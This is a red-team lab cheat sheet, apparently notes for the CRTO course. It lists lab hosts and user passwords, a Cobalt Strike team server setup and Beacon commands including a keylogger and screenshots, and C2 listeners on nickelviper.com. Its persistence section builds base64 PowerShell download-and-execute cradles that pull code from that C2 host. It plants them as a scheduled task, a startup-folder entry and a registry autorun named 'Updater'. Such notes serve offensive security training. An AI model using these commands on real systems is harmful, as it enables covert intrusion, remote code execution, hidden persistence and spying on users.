CRTO Cheat Sheet

# CRTO Cheat Sheet ## Lab info ![red_team_ops_lab](https://hackmd.io/_uploads/r1C7EBFoa.png) ### Hosts | IP | Name | Hostname | | ---------------------------- | ------------------- | ------------------------- | | 10.10.255.244, 10.10.254.244 | AdminBox | | | 10.10.5.40 | Attacker Desktop | DESKTOP- 3BSK7NO | | 10.10.5.50 | Attacker Linux | ubuntu | | 10.10.122.10 | Domain Controller 2 | dc-2.dev.cyberbotic.io | | 10.10.120.100 | Elastic Stack | elk.cyberbotic.io | | 10.10.120.20 | Exchange Server | mail.cyberbotic.io | | 10.10.122.15 | File Share | fs.dev.cyberbotic.io | | 10.10.151.10 | MSP DC | ad.msp.org | | 10.10.5.250 | PowerDNS | powerdns | | 10.10.120.30 | SCM Server 1 | scm-1.cyberbotic.io | | 10.10.120.25 | SQL Server 1 | sql-1.cyberbotic.io | | 10.10.122.25 | SQL Server 2 | sql-2.cyberbotic.io | | 10.10.122.254 | Squid Proxy | squid.dev.cyberbotic.io | | 10.10.150.10 | Studio DC | dc.dev.studio.com | | 10.10.122.30 | Web Server | web.dev.cyberbotic.io | | 10.10.123.101 | Workstation 1 | wkstn-1.dev.cyberbotic.io | | 10.10.123.102 | Workstation 2 | wkstn-2.dev.cyberbotic.io | ### Credentials | Username | Password | Hostname | Domain | Comments | | -------- | --------- | -------- | ----------------- | -------- | | bfarmer | Sup3rman | | dev.cyberbotic.io | | | jking | Qwerty123 | | dev.cyberbotic.io | | | nlamb | F3rrari | | dev.cyberbotic.io | | | nglover | BenNev!s | | cyberbotic.io | | ## Cobalt Strike ### Team Server #### From terminal ```bash sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile # Use TMUX ``` #### As a Service ```bash sudo nano /etc/systemd/system/teamserver.service ``` ```bash [Unit] Description=Cobalt Strike Team Server After=network.target StartLimitIntervalSec=0 [Service] Type=simple Restart=always RestartSec=1 User=root WorkingDirectory=/home/attacker/cobaltstrike ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile [Install] WantedBy=multi-user.target ``` ```bash sudo systemctl daemon-reload sudo systemctl status teamserver.service ``` ```bash sudo systemctl start teamserver.service sudo systemctl stop teamserver.service ``` ```bash sudo systemctl enable teamserver.service sudo systemctl disable teamserver.service ``` ### Beacon ```bash # Basic sleep <seconds> <jitter> # sleep 5 50 connect <target> execute-assembly <path-tool> <params-tool> # Execute binary on remote Beacon run netstat -anop tcp # View listening ports jobs jobkill <jib> # Recon net logons clipboard keylogger printscreen screenshot screenwatch # DNS Beacon checkin # Get metadata/info Beacon ``` ### Listeners | name | payload | host | port | bindto | beacons | profile | | --------- | ---------------------------------- | -------------------- | ----------------------------------------------------------------- | ------ | -------------------- | ------- | | dns | windows/beacon_dns/reverse_dns_txt | pics.nickelviper.com | 53 | | pics.nickelviper.com | default | | http | windows/beacon_http/reverse_http | nickelviper.com | 80 | | nickelviper.com | default | | smb | windows/beacon_bind_pipe | | TSVCPIPE-8ff80863-eb68-48ad-b397-34ae76d3577e (cambiar 4 últimos) | | | | | tcp | windows/beacon_bind_tcp | | 4444 | | 0.0.0.0 | | | tcp-local | windows/beacon_bind_tcp | | 4444 | | 127.0.0.1 | | ## Recon ### Host ```bash execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe -group=system ``` ## Persistence ### b64 Payload Powershell Generate b64 ```powershell $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))' [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str)) ``` Linux Generate b64 ```bash set str 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))' echo -en $str | iconv -t UTF-16LE | base64 -w 0 ``` ### Task Scheduler ### b64 Payload Powershell Generate b64 ```powershell $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))' [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str)) ``` Linux Generate b64 ```bash set str 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))' echo -en $str | iconv -t UTF-16LE | base64 -w 0 ``` Beacon ```bash execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -n "Updater" -m add -o hourly ``` - `-t` is the desired persistence technique. - `-c` is the command to execute. - `-a` are any arguments for that command. - `-n` is the name of the task. - `-m` is to add the task (you can also remove, check and list). - `-o` is the task frequency. ### Startup Folder Beacon ```bash execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -f "UserEnvSetup" -m add ``` ### Registry AutoRun Beacon ```bash cd C:\ProgramData upload C:\Payloads\http_x64.exe mv http_x64.exe updater.exe execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add ``` ## MS SQL Server ```bash powershell-import C:\Tools\PowerUpSQL\PowerUpSQL.ps1 ``` ``` ``` ``` ```